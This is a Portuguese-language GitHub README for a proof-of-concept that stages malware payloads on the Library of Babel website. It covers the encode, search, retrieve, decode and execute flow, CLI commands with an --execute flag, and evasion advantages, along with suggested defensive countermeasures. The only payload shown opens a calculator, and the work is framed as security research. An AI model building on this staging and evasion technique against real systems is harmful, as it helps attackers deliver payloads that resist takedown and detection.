Skip to content

README.md

Latest commit

 

History

History
346 lines (265 loc) · 12.8 KB

README.md

File metadata and controls

346 lines (265 loc) · 12.8 KB

Malware Staging Persistente via Biblioteca de Babel

O Problema que Este Projeto Resolve

Em ataques modernos de malware staging, atacantes frequentemente utilizam URLs externas para hospedar o payload do próximo estágio. No entanto, essa abordagem apresenta um problema crítico: os sites eventualmente são derrubados.

Quando isso acontece:

  • O malware perde acesso ao código do próximo estágio
  • A operação é interrompida
  • Os atacantes perdem o payload que estava hospedado

A Solução: Biblioteca de Babel como Storage Imutável

Este projeto demonstra uma técnica inovadora de malware staging que elimina o problema de URLs sendo derrubadas, utilizando a Biblioteca de Babel como repositório de código.

Por que a Biblioteca de Babel?

A Biblioteca de Babel é um projeto que gera de forma determinística todas as combinações possíveis de texto. Isso significa que:

  • Permanência garantida: O conteúdo "existe" matematicamente e pode ser sempre recuperado
  • Não pode ser derrubado: Não há arquivo físico para deletar, apenas um algoritmo que recalcula o conteúdo
  • Sem hospedagem própria: O atacante não precisa manter infraestrutura
  • Aparência legítima: É um site cultural/artístico, não levanta suspeitas
  • Sem autenticação: Não requer custos ou necessidade de autenticação

Como Funciona

Visão Geral do Fluxo

1. Atacante codifica o payload malicioso
2. Busca a "localização" do payload na Biblioteca de Babel
3. Compartilha apenas as coordenadas (hex, wall, shelf, volume, page)
4. Malware recupera o payload usando as coordenadas
5. Decodifica e executa o código

Componentes do Projeto

encoder.py

Responsável pela codificação e decodificação do payload:

  • Converte código ASCII em formato compatível com a Biblioteca de Babel
  • Utiliza apenas caracteres a-z, espaço, ponto e vírgula
  • Implementa mapeamento reversível para recuperação exata do código
  • Sistema de cache: Mapeamentos são calculados uma vez e reutilizados
  • Otimizado: Usa list comprehension e join para melhor performance
  • Documentado: Docstrings completas em todas as funções

babel.py

Interface com a Biblioteca de Babel:

  • search(): Localiza onde uma string específica "existe" na biblioteca
  • browse(): Recupera o conteúdo de uma página específica usando coordenadas
  • get_random_page(): Recupera uma página aleatória da biblioteca
  • Retorna coordenadas: hexágono, parede, prateleira, volume e página
  • Exceções customizadas: BabelError, ValidationError, SearchError, BrowseError
  • Timeout configurável: Previne travamentos em requisições HTTP
  • Validação robusta: Verifica todos os parâmetros antes de fazer requisições

main.py

Demonstração completa do ataque com interface CLI:

  1. Define o payload malicioso (configurável via --payload)
  2. Codifica o payload para formato Babel
  3. Busca as coordenadas na Biblioteca
  4. Recupera o conteúdo usando as coordenadas
  5. Decodifica e valida a integridade do payload
  6. Executa apenas se --execute for especificado (modo seguro por padrão)
  • Logging estruturado: Acompanhamento detalhado de cada fase
  • Tratamento de erros: Não quebra em falhas, reporta problemas claramente
  • Modo seguro: Mostra o que seria executado sem executar de fato
  • Recuperação direta: Pode pular a busca se coordenadas já são conhecidas

Instalação e Uso

Requisitos

  • Python 3.x
  • Bibliotecas: requests, beautifulsoup4

Instalação

# Clone o repositório
git clone https://github.com/Sonael/Babel_Malware_Staging.git
cd Babel_Malware_Staging

# Crie um ambiente virtual (recomendado)
python -m venv venv

# Ative o ambiente virtual
# Windows:
.\venv\Scripts\activate
# macOS/Linux:
source venv/bin/activate

# Instale as dependências
pip install -r requirements.txt

Executando a PoC

O script principal agora possui uma interface de linha de comando completa com várias opções:

# Demonstração segura (não executa o payload)
python main.py

# Demonstração com payload customizado (modo seguro)
python main.py --payload "print('Hello, World!')"

# Executar payload (PERIGOSO - use apenas em ambiente controlado)
python main.py --payload "print('test')" --execute

# Recuperar e decodificar usando coordenadas conhecidas
python main.py --coordinates "hex,wall,shelf,volume,page"

# Ver todas as opções disponíveis
python main.py --help

Opções de Linha de Comando

  • --payload TEXT: Código Python a ser usado como payload (padrão: exemplo com calc.exe)
  • --execute: Executa o payload recuperado (por padrão, apenas mostra o código sem executar)
  • --coordinates HEX,WALL,SHELF,VOLUME,PAGE: Recupera diretamente de coordenadas conhecidas

Saída Esperada

[INFO] ============================================================
[INFO] MALWARE STAGING DEMONSTRATION
[INFO] ============================================================

[INFO] --- PHASE 1: Encode and Store ---
[INFO] Encoding payload to Babel format...
[INFO] Encoded payload: import subprocess...
[INFO] Searching in Library of Babel...
[INFO] Location found: hex=abc123..., wall=1, shelf=2, vol=3, page=4

[INFO] --- PHASE 2: Retrieve and Decode ---
[INFO] Retrieving from Library of Babel...
[INFO] Retrieved 3200 characters
[INFO] Decoding from Babel format...
[INFO] Decoded payload: import subprocess; subprocess.Popen('calc.exe')
[INFO] Integrity check: PASSED

[INFO] --- PHASE 3: Execute ---
[WARNING] SAFE MODE: Would execute the following payload:
[WARNING] import subprocess; subprocess.Popen('calc.exe')

[INFO] ============================================================
[INFO] DEMONSTRATION COMPLETE
[INFO] ============================================================

Vantagens da Técnica

Comparado com Métodos Tradicionais

Método Tradicional Biblioteca de Babel
URL pode ser derrubada Conteúdo é permanente
Requer hospedagem própria Sem infraestrutura necessária
Logs de acesso são criados Acesso é anônimo entre outros usuários
Domínio pode ser bloqueado Site legítimo, difícil de bloquear
Custos de hosting Completamente gratuito

Características de Segurança Operacional

  • Dificuldade de detecção: Tráfego para um site cultural legítimo
  • Sem rastros de hospedagem: Nenhum servidor comprometido ou alugado
  • Recuperação garantida: Mesmo anos depois, o conteúdo estará acessível

Limitações e Considerações

Limitações Técnicas

  • Tamanho do payload: Limitado pelo tamanho de página da Biblioteca (~3200 caracteres)
  • Latência: Busca e recuperação podem levar alguns segundos
  • Dependência externa: Requer que libraryofbabel.info esteja online
  • Taxa de requisição: Pode haver rate limiting em múltiplas requisições

Mitigações implementadas:

  • Timeout de 30 segundos previne travamentos indefinidos
  • Sistema de cache reduz requisições repetidas para encode/decode
  • Modo de recuperação direta por coordenadas elimina fase de busca
  • Tratamento de erros evita falhas cascata

Possíveis Contramedidas

Medidas defensivas que podem ser implementadas por equipes de segurança:

  • Monitoramento de acessos repetidos a libraryofbabel.info
  • Análise de padrões de requisições POST para book.cgi
  • Bloqueio do domínio em ambientes corporativos críticos
  • Implementação de DPI (Deep Packet Inspection) para detectar padrões de coordenadas Babel
  • Análise comportamental de processos que fazem requisições para o domínio

Propósito Educacional

Este projeto é estritamente para fins educacionais e de pesquisa em segurança cibernética.

Objetivos de Aprendizado

  • Demonstrar técnicas criativas de malware staging
  • Ilustrar conceitos de steganografia aplicada
  • Explorar uso adversarial de plataformas legítimas
  • Ensinar sobre persistência de payload

Exemplos de Uso Educacional

1. Teste de Codificação/Decodificação

# Testar o encoder independentemente
python -c "import encoder; print(encoder.encode_to_babel('test'))"

2. Demonstração Segura

# Mostra todo o processo sem executar código
python main.py --payload "print('Demonstração educacional')"

3. Recuperação de Coordenadas Conhecidas

# Útil para demonstrar a persistência do conteúdo
python main.py --coordinates "abc123xyz,1,2,3,4"

4. Teste com Script Inofensivo

# Demonstração com execução real de código seguro (Abre a calculadora)
python main.py --payload "import os; os.system('calc')" --execute

Aviso Legal

NÃO USE ESTA TÉCNICA PARA ATIVIDADES ILEGAIS

Este código é fornecido apenas para:

  • Pesquisa em segurança da informação
  • Testes em ambientes controlados e autorizados
  • Desenvolvimento de contramedidas defensivas
  • Educação em cibersegurança

O uso não autorizado desta técnica pode violar leis locais e internacionais. Os autores não se responsabilizam por uso indevido.

Arquitetura e Design

Fluxo de Dados

┌─────────────────┐
│  Payload ASCII  │
└────────┬────────┘
         │ encoder.encode_to_babel()
         ▼
┌─────────────────┐
│  Babel Format   │
└────────┬────────┘
         │ babel.search()
         ▼
┌─────────────────┐
│  Coordenadas    │ (hex, wall, shelf, volume, page)
└────────┬────────┘
         │ babel.browse()
         ▼
┌─────────────────┐
│  Babel Format   │
└────────┬────────┘
         │ encoder.decode_from_babel()
         ▼
┌─────────────────┐
│  Payload ASCII  │
└────────┬────────┘
         │ subprocess.run() [se --execute]
         ▼
┌─────────────────┐
│    Execução     │
└─────────────────┘

Estrutura de Módulos

babel/
├── encoder.py          # Codificação/decodificação ASCII ↔ Babel
├── babel.py            # Interface com Library of Babel API
├── main.py             # Demonstração CLI com orquestração completa
├── requirements.txt    # Dependências Python
└── README.md          # Documentação

Tratamento de Erros

O código implementa um sistema robusto de tratamento de erros em três camadas:

  1. Validação de entrada: Parâmetros são validados antes de qualquer operação
  2. Exceções customizadas: Erros específicos para cada tipo de falha (ValidationError, SearchError, BrowseError)
  3. Recuperação graceful: Falhas não causam crashes, apenas retornam valores apropriados

Trabalhos Futuros

Possíveis expansões e melhorias do projeto:

Segurança e Privacidade

  • Implementar criptografia do payload antes da codificação (AES-256, ChaCha20)
  • Adicionar assinatura digital para validar autenticidade do payload
  • Ofuscação adicional das coordenadas usando codificação customizada
  • Steganografia de segunda camada para ocultar as próprias coordenadas

Performance e Escalabilidade

  • Sistema de cache persistente em disco para mapeamentos
  • Suporte a payloads multi-página para código maior que 3200 caracteres
  • Compressão de payload (gzip, zlib) antes da codificação
  • Pool de conexões HTTP para requisições paralelas

Funcionalidades Avançadas

  • Sistema de versionamento de payloads com histórico
  • Fallback automático para múltiplas localizações
  • Interface web para demonstração visual do processo
  • Modo de operação totalmente offline (cálculo local de coordenadas)

Detecção e Contramedidas

  • Implementar detector de padrões Babel em tráfego de rede
  • Sistema de honeypot simulando a API da Biblioteca
  • Análise de entropia para detectar payloads codificados
  • Ferramentas de análise forense para investigação

Referências

Projeto Original

Técnicas de Ataque

Steganografia e Evasão

Ferramentas e Bibliotecas

Autor

Sonael Neto